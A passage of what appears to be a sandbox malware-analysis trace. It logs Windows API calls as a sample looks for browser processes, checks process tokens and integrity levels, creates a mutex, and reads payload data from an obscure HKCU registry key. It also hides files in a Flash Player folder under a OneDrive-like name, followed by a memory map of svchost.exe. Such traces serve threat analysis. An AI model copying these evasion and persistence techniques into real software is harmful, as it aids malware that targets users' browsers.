lpString2="hottest-jm-depression-fought.exe") returned -1 [0249.604] lstrcmpiW (lpString1="opera.exe", lpString2="hottest-jm-depression-fought.exe") returned 1 [0249.604] lstrcmpiW (lpString1="iexplore.exe", lpString2="hottest-jm-depression-fought.exe") returned 1 [0249.605] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="hottest-jm-depression-fought.exe") returned 1 [0249.605] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="hottest-jm-depression-fought.exe") returned 1 [0249.605] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x8c8) returned 0xbc [0249.605] OpenProcessToken (in: ProcessHandle=0xbc, DesiredAccess=0x8, TokenHandle=0x4bfd24 | out: TokenHandle=0x4bfd24*=0x114) returned 1 [0249.605] GetTokenInformation (in: TokenHandle=0x114, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x4bfd0c | out: TokenInformation=0x0, ReturnLength=0x4bfd0c) returned 0 [0249.605] GetLastError () returned 0x7a [0249.605] GetTokenInformation (in: TokenHandle=0x114, TokenInformationClass=0x1, TokenInformation=0x265faf8, TokenInformationLength=0x24, ReturnLength=0x4bfd0c | out: TokenInformation=0x265faf8, ReturnLength=0x4bfd0c) returned 1 [0249.605] GetTokenInformation (in: TokenHandle=0x114, TokenInformationClass=0xc, TokenInformation=0x4bfd3c, TokenInformationLength=0x4, ReturnLength=0x4bfd20 | out: TokenInformation=0x4bfd3c, ReturnLength=0x4bfd20) returned 1 [0249.605] CloseHandle (hObject=0x114) returned 1 [0249.605] CloseHandle (hObject=0xbc) returned 1 [0249.605] GetLengthSid (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0249.605] OpenProcessToken (in: ProcessHandle=0xbc, DesiredAccess=0x20008, TokenHandle=0x4bfd3c | out: TokenHandle=0x4bfd3c*=0x114) returned 1 [0249.605] GetTokenInformation (in: TokenHandle=0x114, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x4bfd38 | out: TokenInformation=0x0, ReturnLength=0x4bfd38) returned 0 [0249.605] GetLastError () returned 0x7a [0249.605] GetTokenInformation (in: TokenHandle=0x114, TokenInformationClass=0x19, TokenInformation=0x265faf8, TokenInformationLength=0x14, ReturnLength=0x4bfd38 | out: TokenInformation=0x265faf8, ReturnLength=0x4bfd38) returned 1 [0249.605] GetSidSubAuthorityCount (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0x265fb01 [0249.605] GetSidSubAuthority (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0x265fb08 [0249.605] lstrcmpiW (lpString1="firefox.exe", lpString2="saturday.exe") returned -1 [0249.605] lstrcmpiW (lpString1="chrome.exe", lpString2="saturday.exe") returned -1 [0249.605] lstrcmpiW (lpString1="opera.exe", lpString2="saturday.exe") returned -1 [0249.605] lstrcmpiW (lpString1="iexplore.exe", lpString2="saturday.exe") returned -1 [0249.605] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="saturday.exe") returned -1 [0249.605] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="saturday.exe") returned -1 [0249.605] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x9a0) returned 0x0 [0249.605] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x9e0) returned 0x0 [0249.605] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xbe8) returned 0x0 [0249.605] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6cc) returned 0x0 [0249.605] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa18) returned 0x0 [0249.605] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x634) returned 0xbc [0249.605] OpenProcessToken (in: ProcessHandle=0xbc, DesiredAccess=0x8, TokenHandle=0x4bfd24 | out: TokenHandle=0x4bfd24*=0x114) returned 1 [0249.605] GetTokenInformation (in: TokenHandle=0x114, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x4bfd0c | out: TokenInformation=0x0, ReturnLength=0x4bfd0c) returned 0 [0249.605] GetLastError () returned 0x7a [0249.605] GetTokenInformation (in: TokenHandle=0x114, TokenInformationClass=0x1, TokenInformation=0x265faf8, TokenInformationLength=0x24, ReturnLength=0x4bfd0c | out: TokenInformation=0x265faf8, ReturnLength=0x4bfd0c) returned 1 [0249.605] GetTokenInformation (in: TokenHandle=0x114, TokenInformationClass=0xc, TokenInformation=0x4bfd3c, TokenInformationLength=0x4, ReturnLength=0x4bfd20 | out: TokenInformation=0x4bfd3c, ReturnLength=0x4bfd20) returned 1 [0249.606] CloseHandle (hObject=0x114) returned 1 [0249.606] CloseHandle (hObject=0xbc) returned 1 [0249.606] GetLengthSid (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0249.606] OpenProcessToken (in: ProcessHandle=0xbc, DesiredAccess=0x20008, TokenHandle=0x4bfd3c | out: TokenHandle=0x4bfd3c*=0x114) returned 1 [0249.606] GetTokenInformation (in: TokenHandle=0x114, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x4bfd38 | out: TokenInformation=0x0, ReturnLength=0x4bfd38) returned 0 [0249.606] GetLastError () returned 0x7a [0249.606] GetTokenInformation (in: TokenHandle=0x114, TokenInformationClass=0x19, TokenInformation=0x265faf8, TokenInformationLength=0x14, ReturnLength=0x4bfd38 | out: TokenInformation=0x265faf8, ReturnLength=0x4bfd38) returned 1 [0249.606] GetSidSubAuthorityCount (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0x265fb01 [0249.606] GetSidSubAuthority (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0x265fb08 [0249.606] lstrcmpiW (lpString1="firefox.exe", lpString2="svchost.exe") returned -1 [0249.606] lstrcmpiW (lpString1="chrome.exe", lpString2="svchost.exe") returned -1 [0249.606] lstrcmpiW (lpString1="opera.exe", lpString2="svchost.exe") returned -1 [0249.606] lstrcmpiW (lpString1="iexplore.exe", lpString2="svchost.exe") returned -1 [0249.606] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="svchost.exe") returned -1 [0249.606] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="svchost.exe") returned -1 [0249.606] VirtualFree (lpAddress=0x160000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0249.606] WaitForSingleObject (hHandle=0x8, dwMilliseconds=0x7d0) Thread: id = 173 os_tid = 0xa8c [0215.524] WaitForSingleObject (hHandle=0x8, dwMilliseconds=0x0) returned 0x102 [0215.527] wvnsprintfW (in: pszDest=0xf1ee70, cchDest=3, pszFmt="%02X", arglist=0xf1ee4c | out: pszDest="B3") returned 2 [0215.527] wvnsprintfW (in: pszDest=0xf1ee70, cchDest=3, pszFmt="%02X", arglist=0xf1ee4c | out: pszDest="F6") returned 2 [0215.527] wvnsprintfW (in: pszDest=0xf1ee70, cchDest=3, pszFmt="%02X", arglist=0xf1ee4c | out: pszDest="E5") returned 2 [0215.527] wvnsprintfW (in: pszDest=0xf1ee70, cchDest=3, pszFmt="%02X", arglist=0xf1ee4c | out: pszDest="3F") returned 2 [0215.527] wvnsprintfW (in: pszDest=0xf1ee70, cchDest=3, pszFmt="%02X", arglist=0xf1ee4c | out: pszDest="12") returned 2 [0215.527] wvnsprintfW (in: pszDest=0xf1ee70, cchDest=3, pszFmt="%02X", arglist=0xf1ee4c | out: pszDest="0A") returned 2 [0215.527] wvnsprintfW (in: pszDest=0xf1ee70, cchDest=3, pszFmt="%02X", arglist=0xf1ee4c | out: pszDest="5B") returned 2 [0215.527] wvnsprintfW (in: pszDest=0xf1ee70, cchDest=3, pszFmt="%02X", arglist=0xf1ee4c | out: pszDest="E5") returned 2 [0215.527] wvnsprintfW (in: pszDest=0xf1ee70, cchDest=3, pszFmt="%02X", arglist=0xf1ee4c | out: pszDest="82") returned 2 [0215.527] wvnsprintfW (in: pszDest=0xf1ee70, cchDest=3, pszFmt="%02X", arglist=0xf1ee4c | out: pszDest="5B") returned 2 [0215.533] wvnsprintfW (in: pszDest=0xf1ee70, cchDest=3, pszFmt="%02X", arglist=0xf1ee4c | out: pszDest="9C") returned 2 [0215.537] wvnsprintfW (in: pszDest=0xf1ee70, cchDest=3, pszFmt="%02X", arglist=0xf1ee4c | out: pszDest="06") returned 2 [0215.538] wvnsprintfW (in: pszDest=0xf1ee70, cchDest=3, pszFmt="%02X", arglist=0xf1ee4c | out: pszDest="15") returned 2 [0215.538] wvnsprintfW (in: pszDest=0xf1ee70, cchDest=3, pszFmt="%02X", arglist=0xf1ee4c | out: pszDest="9B") returned 2 [0215.539] wvnsprintfW (in: pszDest=0xf1ee70, cchDest=3, pszFmt="%02X", arglist=0xf1ee4c | out: pszDest="B3") returned 2 [0215.541] wvnsprintfW (in: pszDest=0xf1ee70, cchDest=3, pszFmt="%02X", arglist=0xf1ee4c | out: pszDest="F4") returned 2 [0215.541] CreateMutexW (lpMutexAttributes=0x877e4, bInitialOwner=0, lpName="B3F6E53F120A5BE5825B9C06159BB3F4") returned 0x4c [0215.542] WaitForSingleObject (hHandle=0x4c, dwMilliseconds=0xffffffff) Thread: id = 174 os_tid = 0x960 [0215.542] WaitForSingleObject (hHandle=0x8, dwMilliseconds=0x0) returned 0x102 [0215.543] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="SOFTWARE\\Microsoft\\Acuhci", ulOptions=0x0, samDesired=0x1, phkResult=0x247f4dc | out: phkResult=0x247f4dc*=0xb4) returned 0x0 [0215.543] RegQueryValueExW (in: hKey=0xb4, lpValueName="Baywkivyl", lpReserved=0x0, lpType=0x247f508, lpData=0x0, lpcbData=0x247f4f0*=0x0 | out: lpType=0x247f508*=0x3, lpData=0x0, lpcbData=0x247f4f0*=0x6f0) returned 0x0 [0215.543] RegQueryValueExW (in: hKey=0xb4, lpValueName="Baywkivyl", lpReserved=0x0, lpType=0x247f508, lpData=0x265f890, lpcbData=0x247f4f0*=0x6f0 | out: lpType=0x247f508*=0x3, lpData=0x265f890*, lpcbData=0x247f4f0*=0x6f0) returned 0x0 [0215.543] RegCloseKey (hKey=0xb4) returned 0x0 [0215.554] WaitForMultipleObjects (nCount=0x4, lpHandles=0x265f850*=0x8, bWaitAll=0, dwMilliseconds=0xffffffff) Thread: id = 175 os_tid = 0x964 [0215.554] WaitForSingleObject (hHandle=0x8, dwMilliseconds=0x0) returned 0x102 [0215.554] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="SOFTWARE\\Microsoft\\Acuhci", ulOptions=0x0, samDesired=0x1, phkResult=0x243f3a4 | out: phkResult=0x243f3a4*=0xb4) returned 0x0 [0215.554] RegQueryValueExW (in: hKey=0xb4, lpValueName="Baywkivyl", lpReserved=0x0, lpType=0x243f3d0, lpData=0x0, lpcbData=0x243f3b8*=0x0 | out: lpType=0x243f3d0*=0x3, lpData=0x0, lpcbData=0x243f3b8*=0x6f0) returned 0x0 [0215.554] RegQueryValueExW (in: hKey=0xb4, lpValueName="Baywkivyl", lpReserved=0x0, lpType=0x243f3d0, lpData=0x265f890, lpcbData=0x243f3b8*=0x6f0 | out: lpType=0x243f3d0*=0x3, lpData=0x265f890*, lpcbData=0x243f3b8*=0x6f0) returned 0x0 [0215.554] RegCloseKey (hKey=0xb4) returned 0x0 [0215.554] WaitForMultipleObjects (nCount=0x4, lpHandles=0x265f870*=0x8, bWaitAll=0, dwMilliseconds=0xffffffff) Thread: id = 176 os_tid = 0x968 [0215.554] WaitForSingleObject (hHandle=0x8, dwMilliseconds=0x0) returned 0x102 [0215.555] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xfdf47a, cbMultiByte=6, lpWideCharStr=0x89730, cchWideChar=10 | out: lpWideCharStr="Acuhcina") returned 6 [0215.555] PathCombineW (in: pszDest=0x88f48, pszDir="SOFTWARE\\Microsoft", pszFile="Acuhci" | out: pszDest="SOFTWARE\\Microsoft\\Acuhci") returned="SOFTWARE\\Microsoft\\Acuhci" [0215.555] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xfdf484, cbMultiByte=8, lpWideCharStr=0x89730, cchWideChar=10 | out: lpWideCharStr="Omegovna") returned 8 [0215.555] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xfdf352, cbMultiByte=85, lpWideCharStr=0xfdf07c, cchWideChar=150 | out: lpWideCharStr="Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\sys\\rO4p00rRfog3ie0eV3.ecv甧ý霰\x08ý茶甧霰\x08\x1c绻") returned 85 [0215.555] PathCombineW (in: pszDest=0x89428, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming", pszFile="Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\sys\\rO4p00rRfog3ie0eV3.ecv" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\sys\\rO4p00rRfog3ie0eV3.ecv") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\sys\\rO4p00rRfog3ie0eV3.ecv" [0215.555] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xfdf3ec, cbMultiByte=85, lpWideCharStr=0xfdf080, cchWideChar=150 | out: lpWideCharStr="Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\sys\\Microsoft OneDrive.rigý霰\x08ý茶甧霰\x08\x1c绻") returned 85 [0215.555] PathCombineW (in: pszDest=0x89748, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming", pszFile="Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\sys\\Microsoft OneDrive.rig" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\sys\\Microsoft OneDrive.rig") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\sys\\Microsoft OneDrive.rig" [0215.555] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="SOFTWARE\\Microsoft\\Acuhci", ulOptions=0x0, samDesired=0x1, phkResult=0xfdf49c | out: phkResult=0xfdf49c*=0xb4) returned 0x0 [0215.555] RegQueryValueExW (in: hKey=0xb4, lpValueName="Omegovna", lpReserved=0x0, lpType=0xfdf4c8, lpData=0x0, lpcbData=0xfdf4b0*=0x0 | out: lpType=0xfdf4c8*=0x0, lpData=0x0, lpcbData=0xfdf4b0*=0x0) returned 0x2 [0215.555] RegCloseKey (hKey=0xb4) returned 0x0 [0215.555] CreateFileW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\sys\\rO4p00rRfog3ie0eV3.ecv" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\macromedia\\flash player\\macromedia.com\\support\\flashplayer\\sys\\ro4p00rrfog3ie0ev3.ecv"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xb4 [0215.555] GetFileSizeEx (in: hFile=0xb4, lpFileSize=0xfdf4a0 | out: lpFileSize=0xfdf4a0*=0) returned 1 [0215.555] CloseHandle (hObject=0xb4) returned 1 [0215.555] WaitForSingleObject (hHandle=0x8, dwMilliseconds=0xea60) Thread: id = 177 os_tid = 0x96c [0215.556] WaitForSingleObject (hHandle=0x8, dwMilliseconds=0xffffffff) Thread: id = 201 os_tid = 0x7a0 Thread: id = 202 os_tid = 0x89c Process: id = "14" image_name = "svchost.exe" filename = "c:\\windows\\system32\\svchost.exe" page_root = "0x6dab000" os_pid = "0x3f8" os_integrity_level = "0x4000" os_privileges = "0x60800000" monitor_reason = "rpc_server" parent_id = "12" os_parent_pid = "0x634" cmd_line = "C:\\Windows\\system32\\svchost.exe -k LocalService" cur_dir = "C:\\Windows\\system32\\" os_username = "NT AUTHORITY\\Local Service" os_groups = "Everyone" [0x7], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\SERVICE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT SERVICE\\EventSystem" [0xe], "NT SERVICE\\fdPHost" [0xa], "NT SERVICE\\lltdsvc" [0xa], "NT SERVICE\\netprofm" [0xa], "NT SERVICE\\nsi" [0xa], "NT SERVICE\\sppuinotify" [0xa], "NT SERVICE\\SstpSvc" [0xa], "NT SERVICE\\THREADORDER" [0xa], "NT SERVICE\\W32Time" [0xa], "NT SERVICE\\WdiServiceHost" [0xa], "NT SERVICE\\WebClient" [0xa], "NT SERVICE\\WinHttpAutoProxySvc" [0xa], "NT AUTHORITY\\Logon Session 00000000:0000ca58" [0xc000000f], "LOCAL" [0x7] Region: id = 2333 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 2334 start_va = 0x20000 end_va = 0x26fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 2335 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 2336 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 2337 start_va = 0x50000 end_va = 0xcffff entry_point = 0x0 region_type = private name = "private_0x0000000000050000" filename = "" Region: id = 2338 start_va = 0xd0000 end_va = 0xd1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000d0000" filename = "" Region: id = 2339 start_va = 0xe0000 end_va = 0xe0fff entry_point = 0x0 region_type = private name = "private_0x00000000000e0000" filename = "" Region: id = 2340 start_va = 0xf0000 end_va = 0xf0fff entry_point = 0x0 region_type = private name = "private_0x00000000000f0000" filename = "" Region: id = 2341 start_va = 0x100000 end_va = 0x100fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000100000" filename = "" Region: id = 2342 start_va = 0x120000 end_va = 0x21ffff entry_point = 0x0 region_type = private name = "private_0x0000000000120000" filename = "" Region: id = 2343 start_va = 0x220000 end_va = 0x286fff entry_point = 0x220000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 2344 start_va = 0x290000 end_va = 0x38ffff entry_point = 0x0 region_type = private name = "private_0x0000000000290000" filename = "" Region: id = 2345 start_va = 0x3b0000 end_va = 0x3b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003b0000" filename = "" Region: id = 2346 start_va = 0x3c0000 end_va = 0x3cffff entry_point = 0x0 region_type = private name = "private_0x00000000003c0000" filename = "" Region: id = 2347 start_va = 0x3d0000 end_va = 0x557fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003d0000" filename = "" Region: id = 2348 start_va = 0x560000 end_va = 0x6e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000560000" filename = "" Region: id = 2349 start_va = 0x6f0000 end_va = 0x7affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000006f0000" filename = "" Region: id = 2350 start_va = 0x7b0000 end_va = 0xba2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000007b0000" filename = "" Region: id = 2351 start_va = 0xbb0000 end_va = 0xbb0fff entry_point = 0x0 region_type = private name = "private_0x0000000000bb0000" filename = "" Region: id = 2352 start_va = 0xbc0000 end_va = 0xbc0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000bc0000" filename = "" Region: id = 2353 start_va = 0xbe0000 end_va = 0xbeffff entry_point = 0x0 region_type = private name = "private_0x0000000000be0000" filename = "" Region: id = 2354 start_va = 0xbf0000 end_va = 0xc6ffff entry_point = 0x0 region_type = private name = "private_0x0000000000bf0000" filename = "" Region: id = 2355 start_va = 0xc70000 end_va = 0xceffff entry_point = 0x0 region_type = private name = "private_0x0000000000c70000" filename = "" Region: id = 2356 start_va = 0xcf0000 end_va = 0xd6ffff entry_point = 0x0 region_type = private name = "private_0x0000000000cf0000" filename = "" Region: id = 2357 start_va = 0xd70000 end_va = 0xe6ffff entry_point = 0x0 region_type = private name = "private_0x0000000000d70000" filename = "" Region: id = 2358 start_va = 0xf80000 end_va = 0x124efff entry_point = 0xf80000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 2359 start_va = 0x1250000 end_va = 0x134ffff entry_point = 0x0 region_type = private name = "private_0x0000000001250000" filename = "" Region: id = 2360 start_va = 0x14c0000 end_va = 0x153ffff entry_point = 0x0 region_type = private name = "private_0x00000000014c0000" filename = "" Region: id = 2361 start_va = 0x1580000 end_va = 0x15fffff entry_point = 0x0 region_type = private name = "private_0x0000000001580000" filename = "" Region: id = 2362 start_va = 0x16d0000 end_va = 0x16dffff entry_point = 0x0 region_type = private name = "private_0x00000000016d0000" filename = "" Region: id = 2363 start_va = 0x1780000 end_va = 0x17fffff entry_point = 0x0 region_type = private name = "private_0x0000000001780000" filename = "" Region: id = 2364 start_va = 0x1800000 end_va = 0x18bffff entry_point = 0x1800000 region_type = mapped_file name = "kernelbase.dll.mui" filename = "\\Windows\\System32\\en-US\\KernelBase.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\kernelbase.dll.mui") Region: id = 2365 start_va = 0x18c0000 end_va = 0x193ffff entry_point = 0x0 region_type = private name = "private_0x00000000018c0000" filename = "" Region: id = 2366 start_va = 0x1940000 end_va = 0x19bffff entry_point = 0x0 region_type = private name = "private_0x0000000001940000" filename = "" Region: id = 2367 start_va = 0x1a20000 end_va = 0x1a9ffff entry_point = 0x0 region_type = private name = "private_0x0000000001a20000" filename = "" Region: id = 2368 start_va = 0x1ac0000 end_va = 0x1b3ffff entry_point = 0x0 region_type = private name = "private_0x0000000001ac0000" filename = "" Region: id = 2369 start_va = 0x1b80000 end_va = 0x1bfffff entry_point = 0x0 region_type = private name = "private_0x0000000001b80000" filename = "" Region: id = 2370 start_va = 0x1c50000 end_va = 0x1c5ffff entry_point = 0x0 region_type = private name = "private_0x0000000001c50000" filename = "" Region: id = 2371 start_va = 0x1cf0000 end_va = 0x1deffff entry_point = 0x0 region_type = private name = "private_0x0000000001cf0000" filename = "" Region: id = 2372 start_va = 0x1e60000 end_va = 0x1edffff entry_point = 0x0 region_type = private name = "private_0x0000000001e60000" filename = "" Region: id = 2373 start_va = 0x1f70000 end_va = 0x1feffff entry_point = 0x0 region_type = private name = "private_0x0000000001f70000" filename = "" Region: id = 2374 start_va = 0x1ff0000 end_va = 0x21effff entry_point = 0x0 region_type = private name = "private_0x0000000001ff0000" filename = "" Region: id = 2375 start_va = 0x2240000 end_va = 0x22bffff entry_point = 0x0 region_type = private name = "private_0x0000000002240000" filename = "" Region: id = 2376 start_va = 0x73a40000 end_va = 0x73a42fff entry_point = 0x73a40000 region_type = mapped_file name = "sfc.dll" filename = "\\Windows\\System32\\sfc.dll" (normalized: "c:\\windows\\system32\\sfc.dll") Region: id = 2377 start_va = 0x76e70000 end_va = 0x76f69fff entry_point = 0x76e70000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 2378 start_va = 0x76f70000 end_va = 0x7708efff entry_point = 0x76f70000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 2379 start_va = 0x77090000 end_va = 0x77238fff entry_point = 0x77090000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 2380 start_va = 0x7efe0000 end_va = 0x7f0dffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efe0000" filename = "" Region: id = 2381 start_va = 0x7f0e0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007f0e0000" filename = "" Region: id = 2382 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 2383 start_va = 0xff4d0000 end_va = 0xff4dafff entry_point = 0xff4d0000 region_type = mapped_file name = "svchost.exe" filename = "\\Windows\\System32\\svchost.exe" (normalized: "c:\\windows\\system32\\svchost.exe") Region: id = 2384 start_va = 0x7fef3780000 end_va = 0x7fef378bfff entry_point = 0x7fef3780000 region_type = mapped_file name = "npmproxy.dll" filename = "\\Windows\\System32\\npmproxy.dll" (normalized: "c:\\windows\\system32\\npmproxy.dll") Region: id = 2385 start_va = 0x7fef3790000 end_va = 0x7fef3867fff entry_point = 0x7fef3790000 region_type = mapped_file name = "perftrack.dll" filename = "\\Windows\\System32\\perftrack.dll" (normalized: "c:\\windows\\system32\\perftrack.dll") Region: id = 2386 start_va = 0x7fef4470000 end_va = 0x7fef44ebfff entry_point = 0x7fef4470000 region_type = mapped_file name = "wer.dll" filename = "\\Windows\\System32\\wer.dll" (normalized: "c:\\windows\\system32\\wer.dll") Region: id = 2387 start_va = 0x7fef5300000 end_va = 0x7fef5307fff entry_point = 0x7fef5300000 region_type = mapped_file name = "rasadhlp.dll" filename = "\\Windows\\System32\\rasadhlp.dll" (normalized: "c:\\windows\\system32\\rasadhlp.dll") Region: id = 2388 start_va = 0x7fef5e60000 end_va = 0x7fef5e6ffff entry_point = 0x7fef5e60000 region_type = mapped_file name = "sfc_os.dll" filename = "\\Windows\\System32\\sfc_os.dll" (normalized: "c:\\windows\\system32\\sfc_os.dll") Region: id = 2389 start_va = 0x7fef5e70000 end_va = 0x7fef5e81fff entry_point = 0x7fef5e70000 region_type = mapped_file name = "aepic.dll" filename = "\\Windows\\System32\\aepic.dll" (normalized: "c:\\windows\\system32\\aepic.dll") Region: id = 2390 start_va = 0x7fef7270000 end_va = 0x7fef7288fff entry_point = 0x7fef7270000 region_type = mapped_file name = "wdi.dll" filename = "\\Windows\\System32\\wdi.dll" (normalized: "c:\\windows\\system32\\wdi.dll") Region: id = 2391 start_va = 0x7fef74d0000 end_va = 0x7fef7533fff entry_point = 0x7fef74d0000 region_type = mapped_file name = "webio.dll" filename = "\\Windows\\System32\\webio.dll" (normalized: "c:\\windows\\system32\\webio.dll") Region: id = 2392 start_va = 0x7fef7540000 end_va = 0x7fef75b0fff entry_point = 0x7fef7540000 region_type = mapped_file name = "winhttp.dll" filename = "\\Windows\\System32\\winhttp.dll" (normalized: "c:\\windows\\system32\\winhttp.dll") Region: id = 2393 start_va = 0x7fef7830000 end_va = 0x7fef78a3fff entry_point = 0x7fef7830000 region_type = mapped_file name = "netprofm.dll" filename = "\\Windows\\System32\\netprofm.dll" (normalized: "c:\\windows\\system32\\netprofm.dll") Region: id = 2394 start_va = 0x7fefaa40000 end_va = 0x7fefaa57fff entry_point = 0x7fefaa40000 region_type = mapped_file name = "dhcpcsvc.dll" filename = "\\Windows\\System32\\dhcpcsvc.dll" (normalized: "c:\\windows\\system32\\dhcpcsvc.dll") Region: id = 2395 start_va = 0x7fefaa60000 end_va = 0x7fefaa70fff entry_point = 0x7fefaa60000 region_type = mapped_file name = "dhcpcsvc6.dll" filename = "\\Windows\\System32\\dhcpcsvc6.dll" (normalized: "c:\\windows\\system32\\dhcpcsvc6.dll") Region: id = 2396 start_va = 0x7fefaa90000 end_va = 0x7fefaae2fff entry_point = 0x7fefaa90000 region_type = mapped_file name = "fwpuclnt.dll" filename = "\\Windows\\System32\\FWPUCLNT.DLL" (normalized: "c:\\windows\\system32\\fwpuclnt.dll") Region: id = 2397 start_va = 0x7fefabc0000 end_va = 0x7fefabc9fff entry_point = 0x7fefabc0000 region_type = mapped_file name = "nsisvc.dll" filename = "\\Windows\\System32\\nsisvc.dll" (normalized: "c:\\windows\\system32\\nsisvc.dll") Region: id = 2398 start_va = 0x7fefabe0000 end_va = 0x7fefabeafff entry_point = 0x7fefabe0000 region_type = mapped_file name = "winnsi.dll" filename = "\\Windows\\System32\\winnsi.dll" 